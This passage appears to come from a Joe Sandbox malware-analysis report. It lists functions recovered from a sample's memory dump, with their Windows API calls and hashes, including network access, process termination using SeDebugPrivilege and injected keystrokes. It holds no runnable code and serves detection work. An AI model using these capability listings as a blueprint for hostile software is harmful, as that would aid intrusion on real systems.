                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c5a7449d9a6aae90bbf1a9fc109540e19e68b5ad4f17e2ea447f2037075a133
                                                                                                                                                                                                                                                                                        • Instruction ID: c0d8b3127b9126b8f86606a5b3676f61de487db236be2685b752831533ea2b41
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c5a7449d9a6aae90bbf1a9fc109540e19e68b5ad4f17e2ea447f2037075a133
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC112577A88B07B9FA286760EC07EA6779C9F54B34B200016F904E50D2FBEAAC017515
                                                                                                                                                                                                                                                                                        Function 00F07567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F0758D
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F075CE
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F075F6
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F0773A
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F0775B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fe8116ee0a29296c61e69d81b9dfec50c5b0d01ae0276f24eb2a02aa5e442e19
                                                                                                                                                                                                                                                                                        • Instruction ID: f06da1eee7baa0873983e05b1f46e7396503fd879f8f26914fb29af0fba1330f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8116ee0a29296c61e69d81b9dfec50c5b0d01ae0276f24eb2a02aa5e442e19
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FC15A79D0464AEBDF10DFA8C940BEDBBB1FF08310F14845AE895E3290D734AA51EB61
                                                                                                                                                                                                                                                                                        Function 00F3D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                        • Opcode ID: da4c3c9e6a3be6bd45d4bbb0bffcd05fff11cb34e2e26372a82a58d604e433e9
                                                                                                                                                                                                                                                                                        • Instruction ID: d2b0af46822a0c529bbffa59e954ebec658527cbe3d69f2b5fc165012c8b9404
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da4c3c9e6a3be6bd45d4bbb0bffcd05fff11cb34e2e26372a82a58d604e433e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4661E371E05305AFDB25AF78FC81AAEBBA5AF05330F14016EE945A7282DB35DD00B791
                                                                                                                                                                                                                                                                                        Function 00F95B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00F95C24
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00F95C65
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00F95C6B
                                                                                                                                                                                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00F95C6F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F979F2: DeleteObject.GDI32(00000000), ref: 00F97A1E
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F95CAB
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F95CB8
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F95CEB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00F95D25
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00F95D34
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c505f906f9cecb222d8617a31c6bfdeb095726215262838fcd8b235ae0d419b4
                                                                                                                                                                                                                                                                                        • Instruction ID: a35f0ff0805c530ddef0394be368f5da58ad6c371da0c59857a0d2ea561ec1dc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c505f906f9cecb222d8617a31c6bfdeb095726215262838fcd8b235ae0d419b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9451B130A44A09BFFF26AF65CC49F983B61FB44B60F244112FA249A1E1C775E980FB41
                                                                                                                                                                                                                                                                                        Function 00F013A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F428D1
                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F428EA
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F428FA
                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F42912
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F42933
                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F42942
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F4295F
                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F4296E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9b4520c1bd66cd20948d4210b7847837a63eb06ba8b4a0aec606a6f76a912356
                                                                                                                                                                                                                                                                                        • Instruction ID: 3156212cadeb1ece64c6df14b29fedcaa65f76a655e44984eae55dbc60c93c6c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b4520c1bd66cd20948d4210b7847837a63eb06ba8b4a0aec606a6f76a912356
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5516A34A00209AFDB24CF25CC45BAA7BB6FF58764F50452AF942972E0DB70E991FB50
                                                                                                                                                                                                                                                                                        Function 00F7CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7CBC7
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F7CBDA
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00F7CBEE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7CCB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: GetLastError.KERNEL32 ref: 00F7CD67
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: SetEvent.KERNEL32(?), ref: 00F7CD7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: InternetCloseHandle.WININET(00000000), ref: 00F7CD86
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c58f0373c944b17878aff8be1d795647db7defd443cba89b1c853b42629601e1
                                                                                                                                                                                                                                                                                        • Instruction ID: 75fa992571a1a1b66948cb07d5426a22919986f2317ce4f0d676c593b4cd8ed8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c58f0373c944b17878aff8be1d795647db7defd443cba89b1c853b42629601e1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B317A71600749AFDB229FB5CD44A6ABBF8FF44310B14852FF95E86610C731E814BBA2
                                                                                                                                                                                                                                                                                        Function 00F62EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F643AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetCurrentThreadId.KERNEL32 ref: 00F643B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F62F00), ref: 00F643BB
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F62F0A
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F62F28
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F62F2C
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F62F36
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F62F4E
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F62F52
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F62F5C
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F62F70
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F62F74
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1474f882023d822493959f2ccd9399082e9510814c8eed75309e699678790547
                                                                                                                                                                                                                                                                                        • Instruction ID: 9058e5178bec9e20614ccd8437a2407271de3ee02c25c30b6789c2f13b912d97
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1474f882023d822493959f2ccd9399082e9510814c8eed75309e699678790547
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3801D431784614BBFB1067689C8AF593F5AEB4DB11F200012F318AF1E1C9E26444AAA9
                                                                                                                                                                                                                                                                                        Function 00F62150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F61D95,?,?,00000000), ref: 00F62159
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00F61D95,?,?,00000000), ref: 00F62160
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61D95,?,?,00000000), ref: 00F62175
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00F61D95,?,?,00000000), ref: 00F6217D
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F61D95,?,?,00000000), ref: 00F62180
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61D95,?,?,00000000), ref: 00F62190
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00F61D95,00000000,?,00F61D95,?,?,00000000), ref: 00F62198
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F61D95,?,?,00000000), ref: 00F6219B
                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00F621C1,00000000,00000000,00000000), ref: 00F621B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5b45925945b2bc7b1231feaee858014a49bf7562979330129db5a62194a6585a
                                                                                                                                                                                                                                                                                        • Instruction ID: 7c8ab0b71149f714a2a74800ea15d7a16a4d1f4d7e39459af56851e12c071fca
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b45925945b2bc7b1231feaee858014a49bf7562979330129db5a62194a6585a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701BBB6640308BFEB10AFA5DC4DF6B7BACEB89711F504412FA05DB1A1CA759840DB25
                                                                                                                                                                                                                                                                                        Function 00F8AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00F6DDAC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00F6DDBA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DD87: CloseHandle.KERNEL32(00000000), ref: 00F6DE87
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8ABCA
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F8ABDD
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8AC10
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F8ACC5
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00F8ACD0
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8AD21
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                        • Opcode ID: 56d220a55500628d9b8aa25e19c6c7363dd62877b4e56444a47ba128b23de7fe
                                                                                                                                                                                                                                                                                        • Instruction ID: b463bbe31f15148d59cf17e5e8360a79f52d6d263926b23a56fe235d2d69d4bd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56d220a55500628d9b8aa25e19c6c7363dd62877b4e56444a47ba128b23de7fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B261C271604641AFE320EF14C885F66BBE0EF44318F18849DE4668B7A3C775EC46EB92
                                                                                                                                                                                                                                                                                        Function 00F94322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F943C1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F943D6
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F943F0
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F94435
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F94462
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F94490
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                        • String ID: SysListView32
                                                                                                                                                                                                                                                                                        • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                        • Opcode ID: 002024e6a3e5a059aa56f837249329ff15a438a39ee46f60bb05097aa17d8635
                                                                                                                                                                                                                                                                                        • Instruction ID: 5f8513933cf3f3a5fb6bdf605b8a6f9fa6c7d7a80f2c9e71806010ed58a11924
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 002024e6a3e5a059aa56f837249329ff15a438a39ee46f60bb05097aa17d8635
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC41C131D00319ABEF21DF64CC45FEA7BA9EB583A0F100126F954E7291D775A981EB90
                                                                                                                                                                                                                                                                                        Function 00F6C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6C6C4
                                                                                                                                                                                                                                                                                        • IsMenu.USER32(00000000), ref: 00F6C6E4
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00F6C71A
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(016E5460), ref: 00F6C76B
                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(016E5460,?,00000001,00000030), ref: 00F6C793
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
